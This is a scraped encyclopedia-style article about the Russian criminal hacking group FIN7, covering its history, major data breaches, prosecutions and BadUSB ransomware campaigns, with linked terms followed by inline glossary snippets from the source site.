FIN7
   HOME

TheInfoList



Click Here for Items Related To - FIN7
OR:
FIN7 on:   [Wikipedia]   [Google]   [Amazon]

FIN7, also called Carbon Spider, ELBRUS, or Sangria Tempest, is a Russian criminal advanced persistent threat group that has primarily targeted the U.S. retail, restaurant, and hospitality sectors since mid-2015. A portion of FIN7 is run out of the front company Combi Security. It has been called one of the most successful criminal hacking groups in the world. FIN7 is also associated with GOLD NIAGARA, ITG14, ALPHV and BlackCat.


History

In March 2017 FIN7 engaged in a spearphishing campaign of company employees involved with SEC filings. In August 2018 three members of FIN7 were charged by the
United States Department of Justice The United States Department of Justice (DOJ), also known as the Justice Department, is a United States federal executive departments, federal executive department of the U.S. government that oversees the domestic enforcement of Law of the Unite ...
for cybercrimes that impacted more than 100 U.S. companies. In November 2018 it was reported that FIN7 were behind data breaches of
Red Robin Red Robin Gourmet Burgers, Inc., more commonly known as Red Robin Gourmet Burgers and Brews or simply Red Robin, is an American chain of casual dining restaurants founded in September 1969 in Seattle, Washington. In 1979, the first franchised R ...
,
Chili's Chili's Grill & Bar (stylized as chili's) is an American casual dining restaurant chain founded by Larry Lavine in Texas in 1975 and is currently owned and operated by Brinker International. History Chili's first location, a converted postal ...
,
Arby's Arby's is an American fast-food restaurant, fast food sandwich restaurant chain with more than 3,300 restaurants. The flagship property of Inspire Brands, it ranked third in systemwide sales in the United States in the quick-service and fast-ca ...
,
Burgerville Burgerville (originally Burgerville USA) is a privately held American restaurant chain in Oregon and southwest Washington, owned by The Holland Inc. As the chain's name suggests, Burgerville's sandwich menu consists mostly of hamburgers. As ...
,
Omni Hotels Omni Hotels & Resorts is an American privately held, international hotel company based in Dallas, Texas. The company was founded in 1958 as Dunfey Hotels, and operates 51 properties in the United States and Canada, totaling over 20,010 rooms and ...
and
Saks Fifth Avenue Saks Fifth Avenue (Colloquialism, colloquially Saks) is an American Luxury goods, luxury department store chain founded in 1867 by Andrew Saks. The first store opened in the F Street and 7th Street shopping districts, F Street shopping distric ...
. In March 2020, the
FBI The Federal Bureau of Investigation (FBI) is the domestic Intelligence agency, intelligence and Security agency, security service of the United States and Federal law enforcement in the United States, its principal federal law enforcement ag ...
issued a warning that members of FIN7 have been targeting companies in the retail, restaurant, and hotel industries with
BadUSB BadUSB is a computer security attack using USB devices that are programmed with malicious software. For example, USB flash drives can contain a programmable Intel 8051 microcontroller, which can be reprogrammed, turning a USB flash drive into a m ...
attacks designed to deliver
REvil REvil (Ransomware Evil; also known as Sodinokibi) was a Russia-based or Russian-speaking private ransomware-as-a-service (RaaS) operation. After an attack, REvil would threaten to publish the information on their page ''Happy Blog'' unless the ra ...
or BlackMatter
ransomware Ransomware is a type of malware that Encryption, encrypts the victim's personal data until a ransom is paid. Difficult-to-trace Digital currency, digital currencies such as paysafecard or Bitcoin and other cryptocurrency, cryptocurrencies are com ...
. Packages have been sent to employees in IT,
executive management Senior management, executive management, or upper management is an occupation at the highest level of management of an organization, performed by individuals who have the day-to-day tasks of managing the organization, sometimes a company or a cor ...
, and
human resources Human resources (HR) is the set of people who make up the workforce of an organization, business sector, industry, or economy. A narrower concept is human capital, the knowledge and skills which the individuals command. Similar terms include ' ...
departments. One intended target was sent a package in the mail which contained a fake
gift card A gift card, also known as a gift certificate in North America, or gift voucher or gift token in the UK, is a prepaid stored-value card, stored-value money card, usually issued by a retailer or bank, to be used as an alternative to cash for pu ...
from
Best Buy Best Buy Co., Inc. is an American multinational consumer electronics retailer headquartered in Richfield, Minnesota. Originally founded by Richard M. Schulze and James Wheeler in 1966 as an audio specialty store called Sound of Music, it was r ...
as well as a
USB flash drive A flash drive (also thumb drive, memory stick, and pen drive/pendrive) is a data storage device that includes flash memory with an integrated USB interface. A typical USB drive is removable, rewritable, and smaller than an optical disc, and u ...
with a letter stating that the recipient should plug the drive into their computer to access a list of items that could be purchased with the gift card. When tested, the USB drive emulated a keyboard, and then initiated a series of keystrokes which opened a
PowerShell PowerShell is a shell program developed by Microsoft for task automation and configuration management. As is typical for a shell, it provides a command-line interpreter for interactive use and a script interpreter for automation via a langu ...
window and issued commands to download
malware Malware (a portmanteau of ''malicious software'')Tahir, R. (2018)A study on malware and malware detection techniques . ''International Journal of Education and Management Engineering'', ''8''(2), 20. is any software intentionally designed to caus ...
to the test computer, and then contacted servers in
Russia Russia, or the Russian Federation, is a country spanning Eastern Europe and North Asia. It is the list of countries and dependencies by area, largest country in the world, and extends across Time in Russia, eleven time zones, sharing Borders ...
. In December 2020 it was reported that FIN7 may be a close collaborator of Ryuk. In April 2021 a "high-level manager" of FIN7 Fedir Hladyr from Ukraine was sentenced to 10 years of prison in the United States after he pleaded guilty to charges of conspiracy to commit wire fraud and one count of conspiracy to commit computer hacking. In January 2022, the FBI issued a warning that members of FIN7 have been targeting transportation and insurance companies (since August 2021), and defense companies (since November 2021), with BadUSB attacks designed to deliver REvil and or BlackMatter
ransomware Ransomware is a type of malware that Encryption, encrypts the victim's personal data until a ransom is paid. Difficult-to-trace Digital currency, digital currencies such as paysafecard or Bitcoin and other cryptocurrency, cryptocurrencies are com ...
. The intended targets were sent USB drives in packages claiming to be from
Amazon Amazon most often refers to: * Amazon River, in South America * Amazon rainforest, a rainforest covering most of the Amazon basin * Amazon (company), an American multinational technology company * Amazons, a tribe of female warriors in Greek myth ...
or the
United States Department of Health and Human Services The United States Department of Health and Human Services (HHS) is a cabinet-level executive branch department of the US federal government created to protect the health of the US people and providing essential human services. Its motto is ...
, with letters talking about free gift cards or COVID-19 protocols that were purportedly further explained by information on the USB drive. When plugged in, the USB drives emulate a keyboard, and then initiate a series of keystrokes which open a PowerShell window and issue commands to download malware. In 2021 the group began using software known as ALPHV written in
Rust Rust is an iron oxide, a usually reddish-brown oxide formed by the reaction of iron and oxygen in the catalytic presence of water or air moisture. Rust consists of hydrous iron(III) oxides (Fe2O3·nH2O) and iron(III) oxide-hydroxide (FeO(OH) ...
, which was offered to affiliates as
Ransomware as a Service Ransomware as a service (RaaS) is a cybercrime business model where ransomware operators write software and affiliates pay to launch attacks using said software. Affiliates do not need to have technical skills of their own but rely on the technical ...
. In February 2023 the group was named in the
Irish High Court The High Court () of Ireland is a court which deals at first instance with the most serious and important civil and criminal cases. When sitting as a criminal court it is called the Central Criminal Court and sits with judge and jury. It also ...
as being behind the
Munster Technological University ransomware attack In early February 2023, Munster Technological University suffered a ransomware cyberattack which caused the cancellation of all full and part-time classes affecting the Bishopstown campus, as well as Crawford College of Art and Design, Cork Schoo ...
.


References

{{Reflist Russian advanced persistent threat groups Criminal advanced persistent threat groups